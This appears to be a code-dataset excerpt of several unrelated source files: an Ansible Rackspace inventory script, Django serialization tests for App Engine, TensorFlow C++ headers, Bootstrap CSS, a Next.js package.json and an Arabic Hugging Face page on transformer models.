# use accessIPv[46] instead of looping address for 'public'
for network_name in networks:
if ansible_ssh_host:
break
if network_name == 'public':
for version_name in ip_versions:
if ansible_ssh_host:
break
if version_name == 6 and server.accessIPv6:
ansible_ssh_host = server.accessIPv6
elif server.accessIPv4:
ansible_ssh_host = server.accessIPv4
if not ansible_ssh_host:
addresses = server.addresses.get(network_name, [])
for address in addresses:
for version_name in ip_versions:
if ansible_ssh_host:
break
if address.get('version') == version_name:
ansible_ssh_host = address.get('addr')
break
if ansible_ssh_host:
hostvars[server.name]['ansible_ssh_host'] = ansible_ssh_host
if hostvars:
groups['_meta'] = {'hostvars': hostvars}
with open(get_cache_file_path(regions), 'w') as cache_file:
json.dump(groups, cache_file)
def get_cache_file_path(regions):
regions_str = '.'.join([reg.strip().lower() for reg in regions])
ansible_tmp_path = os.path.join(os.path.expanduser("~"), '.ansible', 'tmp')
if not os.path.exists(ansible_tmp_path):
os.makedirs(ansible_tmp_path)
return os.path.join(ansible_tmp_path,
'ansible-rax-%s-%s.cache' % (
pyrax.identity.username, regions_str))
def _list(regions, refresh_cache=True):
cache_max_age = int(get_config(p, 'rax', 'cache_max_age',
'RAX_CACHE_MAX_AGE', 600))
if (not os.path.exists(get_cache_file_path(regions)) or
refresh_cache or
(time() - os.stat(get_cache_file_path(regions))[-1]) > cache_max_age):
# Cache file doesn't exist or older than 10m or refresh cache requested
_list_into_cache(regions)
with open(get_cache_file_path(regions), 'r') as cache_file:
groups = json.load(cache_file)
print(json.dumps(groups, sort_keys=True, indent=4))
def parse_args():
parser = argparse.ArgumentParser(description='Ansible Rackspace Cloud '
'inventory module')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--list', action='store_true',
help='List active servers')
group.add_argument('--host', help='List details about the specific host')
parser.add_argument('--refresh-cache', action='store_true', default=False,
help=('Force refresh of cache, making API requests to'
'RackSpace (default: False - use cache files)'))
return parser.parse_args()
def setup():
default_creds_file = os.path.expanduser('~/.rackspace_cloud_credentials')
env = get_config(p, 'rax', 'environment', 'RAX_ENV', None)
if env:
pyrax.set_environment(env)
keyring_username = pyrax.get_setting('keyring_username')
# Attempt to grab credentials from environment first
creds_file = get_config(p, 'rax', 'creds_file',
'RAX_CREDS_FILE', None)
if creds_file is not None:
creds_file = os.path.expanduser(creds_file)
else:
# But if that fails, use the default location of
# ~/.rackspace_cloud_credentials
if os.path.isfile(default_creds_file):
creds_file = default_creds_file
elif not keyring_username:
sys.exit('No value in environment variable %s and/or no '
'credentials file at %s'
% ('RAX_CREDS_FILE', default_creds_file))
identity_type = pyrax.get_setting('identity_type')
pyrax.set_setting('identity_type', identity_type or 'rackspace')
region = pyrax.get_setting('region')
try:
if keyring_username:
pyrax.keyring_auth(keyring_username, region=region)
else:
pyrax.set_credential_file(creds_file, region=region)
except Exception as e:
sys.exit("%s: %s" % (e, e.message))
regions = []
if region:
regions.append(region)
else:
try:
# Ansible 2.3+
region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all',
value_type='list')
except TypeError:
# Ansible 2.2.x and below
# pylint: disable=unexpected-keyword-arg
region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all',
islist=True)
for region in region_list:
region = region.strip().upper()
if region == 'ALL':
regions = pyrax.regions
break
elif region not in pyrax.regions:
sys.exit('Unsupported region %s' % region)
elif region not in regions:
regions.append(region)
return regions
def main():
args = parse_args()
regions = setup()
if args.list:
_list(regions, refresh_cache=args.refresh_cache)
elif args.host:
host(regions, args.host)
sys.exit(0)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that the serialization modules are functioning correctly.
In particular, these tests verify that the modifications made to the standard
Django serialization modules function correctly and that the combined datastore
and Django models can be dumped and loaded to all of the provided formats.
"""
import os
import re
import unittest
from StringIO import StringIO
from django.core import serializers
from google.appengine.ext import db
from appengine_django.models import BaseModel
class ModelA(BaseModel):
description = db.StringProperty()
class ModelB(BaseModel):
description = db.StringProperty()
friend = db.Reference(ModelA)
class ModelC(BaseModel):
dt_value = db.DateTimeProperty(auto_now_add=True)
d_value = db.DateProperty(auto_now_add=True)
t_value = db.TimeProperty(auto_now_add=True)
class TestAllFormats(type):
def __new__(cls, name, bases, attrs):
"""Extends base test functions to be called for every serialisation format.
Looks for functions matching 'run.*Test', where the wildcard in the middle
matches the desired test name and ensures that a test case is setup to call
that function once for every defined serialisation format. The test case
that is created will be called 'test<format><name>'. Eg, for the function
'runKeyedObjectTest' functions like 'testJsonKeyedObject' will be created.
"""
test_formats = serializers.get_serializer_formats()
test_formats.remove("python") # Python serializer is only used indirectly.
for func_name in attrs.keys():
m = re.match("^run(.*)Test$", func_name)
if not m:
continue
for format in test_formats:
test_name = "test%s%s" % (format.title(), m.group(1))
test_func = eval("lambda self: getattr(self, \"%s\")(\"%s\")" %
(func_name, format))
attrs[test_name] = test_func
return super(TestAllFormats, cls).__new__(cls, name, bases, attrs)
class SerializationTest(unittest.TestCase):
"""Unit tests for the serialization/deserialization functionality.
Tests that every loaded serialization format can successfully dump and then
reload objects without the objects changing.
"""
__metaclass__ = TestAllFormats
def compareObjects(self, orig, new, format="unknown"):
"""Compares two objects to ensure they are identical.
Args:
orig: The original object, must be an instance of db.Model.
new: The new object, must be an instance of db.Model.
format: The serialization format being tested, used to make error output
more helpful.
Raises:
The function has no return value, but will raise assertion errors if the
objects do not match correctly.
"""
if orig.key().name():
# Only compare object keys when the key is named. Key IDs are not static
# and will change between dump/load. If you want stable Keys they need to
# be named!
self.assertEqual(orig.key(), new.key(),
"keys not equal after %s serialization: %s != %s" %
(format, repr(orig.key()), repr(new.key())))
for key in orig.properties().keys():
oval = getattr(orig, key)
nval = getattr(new, key)
if isinstance(orig.properties()[key], db.Reference):
# Need to compare object keys not the objects themselves.
oval = oval.key()
nval = nval.key()
self.assertEqual(oval, nval, "%s attribute differs after %s "
"serialization: %s != %s" % (key, format, oval, nval))
def doSerialisationTest(self, format, obj, rel_attr=None, obj_ref=None):
"""Runs a serialization test on an object for the specified format.
Args:
format: The name of the Django serialization class to use.
obj: The object to {,de}serialize, must be an instance of db.Model.
rel_attr: Name of the attribute of obj references another model.
obj_ref: The expected object reference, must be an instance of db.Model.
Raises:
The function has no return value but raises assertion errors if the
object cannot be successfully serialized and then deserialized back to an
identical object. If rel_attr and obj_ref are specified the deserialized
object must also retain the references from the original object.
"""
serialised = serializers.serialize(format, [obj])
# Try and get the object back from the serialized string.
result = list(serializers.deserialize(format, StringIO(serialised)))
self.assertEqual(1, len(result),
"%s serialization should create 1 object" % format)
result[0].save() # Must save back into the database to get a Key.
self.compareObjects(obj, result[0].object, format)
if rel_attr and obj_ref:
rel = getattr(result[0].object, rel_attr)
if callable(rel):
rel = rel()
self.compareObjects(rel, obj_ref, format)
def doLookupDeserialisationReferenceTest(self, lookup_dict, format):
"""Tests the Key reference is loaded OK for a format.
Args:
lookup_dict: A dictionary indexed by format containing serialized strings
of the objects to load.
format: The format to extract from the dict and deserialize.
Raises:
This function has no return value but raises assertion errors if the
string cannot be deserialized correctly or the resulting object does not
reference the object correctly.
"""
if format not in lookup_dict:
# Check not valid for this format.
return
obj = ModelA(description="test object", key_name="test")
obj.put()
s = lookup_dict[format]
result = list(serializers.deserialize(format, StringIO(s)))
self.assertEqual(1, len(result), "expected 1 object from %s" % format)
result[0].save()
self.compareObjects(obj, result[0].object.friend, format)
def doModelKeyDeserialisationReferenceTest(self, lookup_dict, format):
"""Tests a model with a key can be loaded OK for a format.
Args:
lookup_dict: A dictionary indexed by format containing serialized strings
of the objects to load.
format: The format to extract from the dict and deserialize.
Returns:
This function has no return value but raises assertion errors if the
string cannot be deserialized correctly or the resulting object is not an
instance of ModelA with a key named 'test'.
"""
if format not in lookup_dict:
# Check not valid for this format.
return
s = lookup_dict[format]
result = list(serializers.deserialize(format, StringIO(s)))
self.assertEqual(1, len(result), "expected 1 object from %s" % format)
result[0].save()
self.assert_(isinstance(result[0].object, ModelA))
self.assertEqual("test", result[0].object.key().name())
# Lookup dicts for the above (doLookupDeserialisationReferenceTest) function.
SERIALIZED_WITH_KEY_AS_LIST = {
"json": """[{"pk": "agR0ZXN0chMLEgZNb2RlbEIiB21vZGVsYmkM", """
""""model": "tests.modelb", "fields": {"description": "test", """
""""friend": ["ModelA", "test"] }}]""",
"yaml": """- fields: {description: !!python/unicode 'test', friend: """
""" [ModelA, test]}\n model: tests.modelb\n pk: """
""" agR0ZXN0chMLEgZNb2RlbEEiB21vZGVsYWkM\n"""
}
SERIALIZED_WITH_KEY_REPR = {
"json": """[{"pk": "agR0ZXN0chMLEgZNb2RlbEIiB21vZGVsYmkM", """
""""model": "tests.modelb", "fields": {"description": "test", """
""""friend": "datastore_types.Key.from_path("""
"""'ModelA', 'test')" }}]""",
"yaml": """- fields: {description: !!python/unicode 'test', friend: """
"""\'datastore_types.Key.from_path("ModelA", "test")\'}\n """
"""model: tests.modelb\n pk: """
""" agR0ZXN0chMLEgZNb2RlbEEiB21vZGVsYWkM\n"""
}
# Lookup dict for the doModelKeyDeserialisationReferenceTest function.
MK_SERIALIZED_WITH_LIST = {
"json": """[{"pk": ["ModelA", "test"], "model": "tests.modela", """
""""fields": {}}]""",
"yaml": """-\n fields: {description: null}\n model: tests.modela\n """
"""pk: [ModelA, test]\n"""
}
MK_SERIALIZED_WITH_KEY_REPR = {
"json": """[{"pk": "datastore_types.Key.from_path('ModelA', 'test')", """
""""model": "tests.modela", "fields": {}}]""",
"yaml": """-\n fields: {description: null}\n model: tests.modela\n """
"""pk: \'datastore_types.Key.from_path("ModelA", "test")\'\n"""
}
MK_SERIALIZED_WITH_KEY_AS_TEXT = {
"json": """[{"pk": "test", "model": "tests.modela", "fields": {}}]""",
"yaml": """-\n fields: {description: null}\n model: tests.modela\n """
"""pk: test\n"""
}
# Lookup dict for the function.
SERIALIZED_WITH_NON_EXISTANT_PARENT = {
"json": """[{"pk": "ahhnb29nbGUtYXBwLWVuZ2luZS1kamFuZ29yIgsSBk1vZG"""
"""VsQiIGcGFyZW50DAsSBk1vZGVsQSIEdGVzdAw", """
""""model": "tests.modela", "fields": """
"""{"description": null}}]""",
"yaml": """- fields: {description: null}\n """
"""model: tests.modela\n """
"""pk: ahhnb29nbGUtYXBwLWVuZ2luZS1kamFuZ29yIgsSBk1"""
"""vZGVsQiIGcGFyZW50DAsSBk1vZGVsQSIEdGVzdAw\n""",
"xml": """<?xml version="1.0" encoding="utf-8"?>\n"""
"""<django-objects version="1.0">\n"""
"""<entity kind="tests.modela" key="ahhnb29nbGUtYXBwL"""
"""WVuZ2luZS1kamFuZ29yIgsSBk1vZGVsQiIGcGFyZW50DA"""
"""sSBk1vZGVsQSIEdGVzdAw">\n """
"""<key>tag:google-app-engine-django.gmail.com,"""
"""2008-05-13:ModelA[ahhnb29nbGUtYXBwLWVuZ2luZS1kam"""
"""FuZ29yIgsSBk1vZGVsQiIGcGFyZW50DAsSBk1vZGVsQSIEdGVzdAw"""
"""]</key>\n <property name="description" """
"""type="null"></property>\n</entity>\n</django-objects>"""
}
# The following functions are all expanded by the metaclass to be run once
# for every registered Django serialization module.
def runKeyedObjectTest(self, format):
"""Test serialization of a basic object with a named key."""
obj = ModelA(description="test object", key_name="test")
obj.put()
self.doSerialisationTest(format, obj)
def runObjectWithIdTest(self, format):
"""Test serialization of a basic object with a numeric ID key."""
obj = ModelA(description="test object")
obj.put()
self.doSerialisationTest(format, obj)
def runObjectWithReferenceTest(self, format):
"""Test serialization of an object that references another object."""
obj = ModelA(description="test object", key_name="test")
obj.put()
obj2 = ModelB(description="friend object", friend=obj)
obj2.put()
self.doSerialisationTest(format, obj2, "friend", obj)
def runObjectWithParentTest(self, format):
"""Test serialization of an object that has a parent object reference."""
obj = ModelA(description="parent object", key_name="parent")
obj.put()
obj2 = ModelA(description="child object", key_name="child", parent=obj)
obj2.put()
self.doSerialisationTest(format, obj2, "parent", obj)
def runObjectWithNonExistantParentTest(self, format):
"""Test deserialization of an object referencing a non-existant parent."""
self.doModelKeyDeserialisationReferenceTest(
self.SERIALIZED_WITH_NON_EXISTANT_PARENT, format)
def runCreateKeyReferenceFromListTest(self, format):
"""Tests that a reference specified as a list in json/yaml can be loaded OK."""
self.doLookupDeserialisationReferenceTest(self.SERIALIZED_WITH_KEY_AS_LIST,
format)
def runCreateKeyReferenceFromReprTest(self, format):
"""Tests that a reference specified as repr(Key) in can loaded OK."""
self.doLookupDeserialisationReferenceTest(self.SERIALIZED_WITH_KEY_REPR,
format)
def runCreateModelKeyFromListTest(self, format):
"""Tests that a model key specified as a list can be loaded OK."""
self.doModelKeyDeserialisationReferenceTest(self.MK_SERIALIZED_WITH_LIST,
format)
def runCreateModelKeyFromReprTest(self, format):
"""Tests that a model key specified as a repr(Key) can be loaded OK."""
self.doModelKeyDeserialisationReferenceTest(
self.MK_SERIALIZED_WITH_KEY_REPR, format)
def runCreateModelKeyFromTextTest(self, format):
"""Tests that a reference specified as a plain key_name loads OK."""
self.doModelKeyDeserialisationReferenceTest(
self.MK_SERIALIZED_WITH_KEY_AS_TEXT, format)
def runDateTimeTest(self, format):
"""Tests that db.DateTimeProperty and related can be correctly handled."""
obj = ModelC()
obj.put()
self.doSerialisationTest(format, obj)
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
/* Copyright 2016 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_CORE_LIB_STRINGS_PROTO_TEXT_UTIL_H_
#define TENSORFLOW_CORE_LIB_STRINGS_PROTO_TEXT_UTIL_H_
#include <cstddef>
#include <string>
#include "absl/strings/escaping.h"
#include "absl/strings/str_cat.h"
#include "absl/strings/string_view.h"
#include "tensorflow/core/platform/numbers.h"
#include "tensorflow/core/platform/scanner.h"
namespace tensorflow {
namespace strings {
static constexpr char kColonSeparator[] = ": ";
// Helper functions for writing proto-text output.
// Used by the code generated from tools/proto_text/gen_proto_text_lib.cc.
class ProtoTextOutput {
public:
// Construct a ProtoTextOutput that writes to <output> If short_debug is true,
// outputs text to match proto.ShortDebugString(); else matches
// proto.DebugString().
ProtoTextOutput(std::string* output, bool short_debug)
: output_(output),
short_debug_(short_debug),
field_separator_(short_debug ? " " : "\n") {}
// Writes opening of nested message and increases indent level.
void OpenNestedMessage(const char field_name[]) {
absl::StrAppend(output_, level_empty_ ? "" : field_separator_, indent_,
field_name, " {", field_separator_);
if (!short_debug_) absl::StrAppend(&indent_, " ");
level_empty_ = true;
}
// Writes close of nested message and decreases indent level.
void CloseNestedMessage() {
if (!short_debug_) indent_.resize(indent_.size() - 2);
absl::StrAppend(output_, level_empty_ ? "" : field_separator_, indent_,
"}");
level_empty_ = false;
}
// Print the close of the top-level message that was printed.
void CloseTopMessage() {
if (!short_debug_ && !level_empty_) absl::StrAppend(output_, "\n");
}
// Appends a numeric value, like my_field: 123
template <typename T>
void AppendNumeric(const char field_name[], T value) {
AppendFieldAndValue(field_name,
absl::StrCat(strings::LegacyPrecision(value)));
}
// Appends a numeric value, like my_field: 123, but only if value != 0.
template <typename T>
void AppendNumericIfNotZero(const char field_name[], T value) {
if (value != 0) AppendNumeric(field_name, value);
}
// Appends a bool value, either my_field: true or my_field: false.
void AppendBool(const char field_name[], bool value) {
AppendFieldAndValue(field_name, value ? "true" : "false");
}
// Appends a bool value, as my_field: true, only if value is true.
void AppendBoolIfTrue(const char field_name[], bool value) {
if (value) AppendBool(field_name, value);
}
// Appends a string value, like my_field: "abc123".
void AppendString(const char field_name[], const std::string& value) {
AppendFieldAndValue(field_name,
absl::StrCat("\"", absl::CEscape(value), "\""));
}
// Appends a string value, like my_field: "abc123", but only if value is not
// empty.
void AppendStringIfNotEmpty(const char field_name[],
const std::string& value) {
if (!value.empty()) AppendString(field_name, value);
}
// Appends the string name of an enum, like my_field: FIRST_ENUM.
void AppendEnumName(const char field_name[], const std::string& name) {
AppendFieldAndValue(field_name, name);
}
private:
void AppendFieldAndValue(const char field_name[],
absl::string_view value_text) {
absl::StrAppend(output_, level_empty_ ? "" : field_separator_, indent_,
field_name, kColonSeparator, value_text);
level_empty_ = false;
}
std::string* const output_;
const bool short_debug_;
const std::string field_separator_;
std::string indent_;
// False when at least one field has been output for the message at the
// current deepest level of nesting.
bool level_empty_ = true;
ProtoTextOutput(const ProtoTextOutput&) = delete;
void operator=(const ProtoTextOutput&) = delete;
};
inline void ProtoSpaceAndComments(Scanner* scanner) {
for (;;) {
scanner->AnySpace();
if (scanner->Peek() != '#') return;
// Skip until newline.
while (scanner->Peek('\n') != '\n') scanner->One(Scanner::ALL);
}
}
// Parse the next numeric value from <scanner>, returning false if parsing
// failed.
template <typename T>
bool ProtoParseNumericFromScanner(Scanner* scanner, T* value) {
absl::string_view numeric_str;
scanner->RestartCapture();
if (!scanner->Many(Scanner::LETTER_DIGIT_DOT_PLUS_MINUS)
.GetResult(nullptr, &numeric_str)) {
return false;
}
// Special case to disallow multiple leading zeroes, to match proto parsing.
int leading_zero = 0;
for (size_t i = 0; i < numeric_str.size(); ++i) {
const char ch = numeric_str[i];
if (ch == '0') {
if (++leading_zero > 1) return false;
} else if (ch != '-') {
break;
}
}
ProtoSpaceAndComments(scanner);
return SafeStringToNumeric<T>(numeric_str, value);
}
// Parse the next boolean value from <scanner>, returning false if parsing
// failed.
bool ProtoParseBoolFromScanner(Scanner* scanner, bool* value);
// Parse the next string literal from <scanner>, returning false if parsing
// failed.
bool ProtoParseStringLiteralFromScanner(Scanner* scanner, std::string* value);
} // namespace strings
} // namespace tensorflow
#endif // TENSORFLOW_CORE_LIB_STRINGS_PROTO_TEXT_UTIL_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/core/lib/strings/proto_text_util.h |
.bi {
display: inline-block;
width: 1rem;
height: 1rem;
}
/*
* Sidebar
*/
@media (min-width: 768px) {
.sidebar .offcanvas-lg {
position: -webkit-sticky;
position: sticky;
top: 48px;
}
.navbar-search {
display: block;
}
}
.sidebar .nav-link {
font-size: .875rem;
font-weight: 500;
}
.sidebar .nav-link.active {
color: #2470dc;
}
.sidebar-heading {
font-size: .75rem;
}
/*
* Navbar
*/
.navbar-brand {
padding-top: .75rem;
padding-bottom: .75rem;
background-color: rgba(0, 0, 0, .25);
box-shadow: inset 1px 0 0 rgba(0, 0, 0, .25);
}
.navbar .form-control {
padding: .75rem 1rem;
} | css | github | https://github.com/twbs/bootstrap | site/src/assets/examples/dashboard/dashboard.rtl.css |
{
"private": true,
"scripts": {
"dev": "next",
"build": "next build",
"start": "next start"
},
"dependencies": {
"next": "latest",
"react": "^18.2.0",
"react-dom": "^18.2.0",
"react-modal": "3.16.1"
}
} | json | github | https://github.com/vercel/next.js | examples/with-route-as-modal/package.json |
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_C_EAGER_ABSTRACT_OPERATION_H_
#define TENSORFLOW_C_EAGER_ABSTRACT_OPERATION_H_
#include <memory>
#include "absl/types/span.h"
#include "tensorflow/c/eager/abstract_tensor_handle.h"
#include "tensorflow/c/tensor_interface.h"
#include "tensorflow/core/framework/tensor_shape.h"
#include "tensorflow/core/framework/types.pb.h"
#include "tensorflow/core/platform/status.h"
namespace tensorflow {
// Abstract interface to an operation.
// This interface allows building and executing an operation in either
// tracing or immediate execution mode.
class AbstractOperation {
protected:
enum AbstractOperationKind {
kGraph,
kMlir,
kEager,
kTfrt,
kTape,
kOpHandler
};
explicit AbstractOperation(AbstractOperationKind kind) : kind_(kind) {}
virtual ~AbstractOperation() {}
public:
AbstractOperationKind getKind() const { return kind_; }
// Release any underlying resources, including the interface object.
//
// WARNING: The destructor of this class is marked as protected to disallow
// clients from directly destroying this object since it may manage it's own
// lifetime through ref counting. Thus this must be allocated on the heap and
// clients MUST call Release() in order to destroy an instance of this class.
virtual void Release() = 0;
virtual absl::Status Reset(const char* op, const char* raw_device_name) = 0;
virtual const string& Name() const = 0;
// Returns the operation's device name.
//
// The value returned may be different from the one set by SetDeviceName, but
// it will be compatible with it: the name will be updated by device placement
// logic to refer to the specific device chosen.
//
// Example: If one calls `op->SetDeviceName("/device:GPU")`, the value
// returned by DeviceName should be "/device:GPU:*" until a particular GPU is
// chosen for the operation by the device placement logic in the
// executor. After that, the value returned by DeviceName will be a full
// device name such as "/job:localhost/replica:0/task:0/device:GPU:1".
virtual const string& DeviceName() const = 0;
// Sets the operation device name.
//
// The given `name` must be parseable by DeviceNameUtils::ParseFullName, and
// the result will be used as a constraint for device placement. See the
// documentation for DeviceName for more details.
//
// The value will override the previous value - that is, no "merging" of
// existing and given constraints will be performed.
virtual absl::Status SetDeviceName(const char* name) = 0;
virtual absl::Status AddInput(AbstractTensorHandle* input) = 0;
virtual absl::Status AddInputList(
absl::Span<AbstractTensorHandle* const> inputs) = 0;
virtual absl::Status Execute(absl::Span<AbstractTensorHandle*> retvals,
int* num_retvals) = 0;
virtual absl::Status SetAttrString(const char* attr_name, const char* data,
size_t length) = 0;
virtual absl::Status SetAttrInt(const char* attr_name, int64_t value) = 0;
virtual absl::Status SetAttrFloat(const char* attr_name, float value) = 0;
virtual absl::Status SetAttrBool(const char* attr_name, bool value) = 0;
virtual absl::Status SetAttrType(const char* attr_name, DataType value) = 0;
virtual absl::Status SetAttrShape(const char* attr_name, const int64_t* dims,
const int num_dims) = 0;
virtual absl::Status SetAttrShape(const char* attr_name,
const PartialTensorShape shape);
virtual absl::Status SetAttrFunction(const char* attr_name,
const AbstractOperation* value) = 0;
virtual absl::Status SetAttrFunctionName(const char* attr_name,
const char* value,
size_t length) = 0;
virtual absl::Status SetAttrTensor(const char* attr_name,
AbstractTensorInterface* tensor) = 0;
virtual absl::Status SetAttrStringList(const char* attr_name,
const void* const* values,
const size_t* lengths,
int num_values) = 0;
virtual absl::Status SetAttrStringList(const char* attr_name,
absl::Span<string const> values);
virtual absl::Status SetAttrFloatList(const char* attr_name,
const float* values,
int num_values) = 0;
virtual absl::Status SetAttrIntList(const char* attr_name,
const int64_t* values,
int num_values) = 0;
virtual absl::Status SetAttrTypeList(const char* attr_name,
const DataType* values,
int num_values) = 0;
virtual absl::Status SetAttrBoolList(const char* attr_name,
const unsigned char* values,
int num_values) = 0;
virtual absl::Status SetAttrShapeList(const char* attr_name,
const int64_t** dims,
const int* num_dims,
int num_values) = 0;
virtual absl::Status SetAttrFunctionList(
const char* attr_name, absl::Span<const AbstractOperation*> values) = 0;
private:
const AbstractOperationKind kind_;
};
// TODO(b/193656009): Defining these in a cc file causes linker errors with
// fastbuild.
inline absl::Status AbstractOperation::SetAttrShape(
const char* attr_name, const PartialTensorShape shape) {
return SetAttrShape(attr_name, shape.dim_sizes().data(), shape.dims());
}
inline absl::Status AbstractOperation::SetAttrStringList(
const char* attr_name, absl::Span<string const> values) {
std::vector<const char*> raw_strs;
std::vector<size_t> lengths;
raw_strs.reserve(values.size());
lengths.reserve(values.size());
for (const auto& s : values) {
raw_strs.emplace_back(s.data());
lengths.emplace_back(s.size());
}
return SetAttrStringList(attr_name,
reinterpret_cast<const void**>(raw_strs.data()),
lengths.data(), values.size());
}
namespace internal {
struct AbstractOperationDeleter {
void operator()(AbstractOperation* p) const {
if (p != nullptr) {
p->Release();
}
}
};
} // namespace internal
using AbstractOperationPtr =
std::unique_ptr<AbstractOperation, internal::AbstractOperationDeleter>;
} // namespace tensorflow
#endif // TENSORFLOW_C_EAGER_ABSTRACT_OPERATION_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/c/eager/abstract_operation.h |
# عائلة نماذج المحول
منذ إطلاقه في عام 2017، ألهم نموذج [المحول الأصلي](https://huggingface.co/papers/1706.03762) (راجع مدونة [المحول المشروح](http://nlp.seas.harvard.edu/2018/04/03/attention.html) لمقدمة تقنية مبسطة)، ألهم العديد من النماذج الجديدة والمبتكرة التي تتجاوز مهام معالجة اللغات الطبيعية (NLP). هناك نماذج للتنبؤ [بالبنية البروتينات المطوية](https://huggingface.co/blog/deep-learning-with-proteins)، و[تدريب على اتخاذ القرار](https://huggingface.co/blog/train-decision-transformers)، و[التنبؤ بالسلاسل الزمنية](https://huggingface.co/blog/time-series-transformers). مع وجود العديد من متغيرات المحول المتاحة، قد يكون من السهل أن تفوتك الصورة الأكبر. ما تشترك فيه جميع هذه النماذج هو أنها تستند إلى بنية المحول الأصلية. تستخدم بعض النماذج فقط الترميز أو فك الترميز، بينما تستخدم نماذج أخرى كليهما. يوفر هذا تصنيفًا مفيدًا لتصنيف واستعراض الفروقات الرئيسية بين نماذج عائلة المحولات، وسيساعدك على فهم النماذج التي لم تصادفها من قبل.
إذا لم تكن على دراية بنموذج المحول الأصلي أو تحتاج إلى تذكير، فراجع الفصل الخاص بـ [كيف تعمل المحولات](https://huggingface.co/course/chapter1/4؟fw=pt) من دورة Hugging Face.
<div align="center">
<iframe width="560" height="315" src="https://www.youtube.com/embed/H39Z_720T5s" title="مشغل فيديو YouTube" frameborder="0" allow="accelerometer؛ تشغيل تلقائي؛ قائمة تشغيل مدمجة؛ محسّنات الفيديو؛ ميزة الإشارات المرجعية" allowfullscreen></iframe>
</div>
## رؤية الحاسب (Computer vision)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2FacQBpeFBVvrDUlzFlkejoz%2FModelscape-timeline%3Fnode-id%3D0%253A1%26t%3Dm0zJ7m2BQ9oe0WtO-1" allowfullscreen></iframe>
### الشبكة التلافيفية (Convolutional network)
لطالما كانت الشبكات التلافيفية (CNNs) الطريقة السائدة لمهام رؤية الحاسب حتى برز [محول الرؤية](https://huggingface.co/papers/2010.11929) قابليته للتطوير وكفاءته العالية. وحتى بعد ذلك، لا تزال بعض أفضل صفات CNN، مثل ثبات الإزاحة، قوية جدًا (خاصة بالنسبة لمهام معينة) لدرجة أن بعض المحولات تدمج التلافيف في بنيتها. قلب [ConvNeXt](model_doc/convnext) هذا التبادل رأسًا على عقب وأدرج خيارات التصميم من المحولات لتحديث CNN. على سبيل المثال، يستخدم ConvNeXt نوافذ منزلقة غير متداخلة لتقسيم الصورة إلى رقع وزيادة حقل مجال العام الخاص بها. كما يقوم ConvNeXt بعدة خيارات مثل تصميم الطبقة لتكون أكثر كفاءة في الذاكرة وتحسين الأداء، مما يجعله منافسًا قويًا للمحولات!
### الترميز[[cv-encoder]] (Encoder)
فتح [محول الرؤية (ViT)](model_doc/vit) الباب أمام مهام رؤية الحاسب دون الاعتماد على التلافيف. يستخدم ViT ترميز محول قياسي، لكن إنجازه الرئيسي كان طريقة معالجته للصورة. فهو تقسّم الصورة إلى رقّعات ذات حجم ثابت ويستخدمها لإنشاء تضمين، تمامًا مثل تقسيم الجملة إلى رموز. استفاد ViT من بنية المُحوِّلات الفعالة لإظهار نتائج تنافسية مع CNNs في ذلك الوقت مع الحاجة إلى موارد أقل للتدريب. وسرعان ما تبع ViT نماذج رؤية أخرى يمكنها أيضًا التعامل مع مهام الرؤية الكثيفة مثل التجزئة والتعرف.
من بين هذه النماذج [Swin](model_doc/swin) Transformer. فهو يبني خرائط سمات هرمية (مثل CNN 👀 على عكس ViT) من رقّعات أصغر حجمًا ودمجها مع الرقع المجاورة في طبقات أعمق. يتم حساب الانتباه فقط ضمن نافذة محلية، ويتم تحويل النافذة بين طبقات الانتباه لإنشاء اتصالات تساعد النموذج على التعلم بشكل أفضل. نظرًا لأن محول Swin يمكنه إنتاج خرائط خصائص هرمية، فهو مرشح جيد لمهام التنبؤ الكثيفة مثل التجزئة والتعرف. كما يستخدم [SegFormer](model_doc/segformer) ترميز محول لبناء خرائط خصائص هرمية، ولكنه يضيف فك تشفير بسيط متعدد الطبقات (MLP) في الأعلى لدمج جميع خرائط الخصائص وإجراء تنبؤ.
